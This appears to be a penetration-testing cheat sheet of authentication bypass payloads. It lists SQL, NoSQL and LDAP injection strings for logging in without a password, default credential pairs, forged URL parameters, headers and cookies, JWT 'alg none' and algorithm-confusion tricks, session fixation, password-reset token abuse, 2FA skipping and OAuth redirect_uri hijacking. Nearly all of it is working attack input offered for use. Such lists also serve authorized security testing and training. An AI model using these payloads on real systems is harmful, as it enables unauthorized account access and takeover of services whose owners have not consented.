🔓 Authentication Bypass Payloads

Login bypass and authentication flaw exploitation

💉 Injection Bypasses

SQL Injection

Bypass authentication via SQL injection

admin' OR '1'='1
admin' OR 1=1--
' OR 1=1--
admin'--
admin' #
' OR 'x'='x

NoSQL Injection

Bypass MongoDB authentication

{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
username[$ne]=admin&password[$ne]=pass

LDAP Injection

Bypass LDAP authentication

*
admin)(&)
*)(uid=*))(|(uid=*

🔑 Default & Weak Credentials

Default Credentials

Common default username/password combinations

admin:admin
admin:password
administrator:administrator
root:root
root:toor
admin:12345

🎛️ Parameter Manipulation

Query Parameters

Modify URL parameters to bypass authorization checks

?admin=true
?role=admin
?authenticated=1
?isAdmin=true
?user=admin

HTTP Headers

Bypass authentication via header injection

X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Forwarded-For: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1

Cookie Manipulation

Modify cookie values for privilege escalation

admin=true
isAdmin=1
role=admin
authenticated=yes

🔐 Token & Session Attacks

JWT Manipulation

Exploit JWT token vulnerabilities

Change "alg" to "none"
Change "role": "user" to "role": "admin"
RS256 to HS256 algorithm confusion

Test with tools: jwt.io, jwt_tool

Session Fixation

Force user to use known session ID

Set session ID before login: ?PHPSESSID=attacker_session
Session ID doesn't change after login

Password Reset

Exploit weak password reset mechanisms

Try sequential tokens: token=1, token=2, etc.
Manipulate email parameter: email=victim@test.com
Reuse old tokens
Race condition: request multiple tokens

🔒 2FA & OAuth Bypasses

2FA Bypass

Techniques to bypass two-factor authentication

Remove 2FA parameter from request
Try direct access to /dashboard after login
Manipulate response: change "2fa_required": true to false
Reuse old 2FA codes

OAuth Misconfiguration

Exploit OAuth implementation flaws

Change redirect_uri to attacker domain
CSRF in OAuth flow
Open redirect in redirect_uri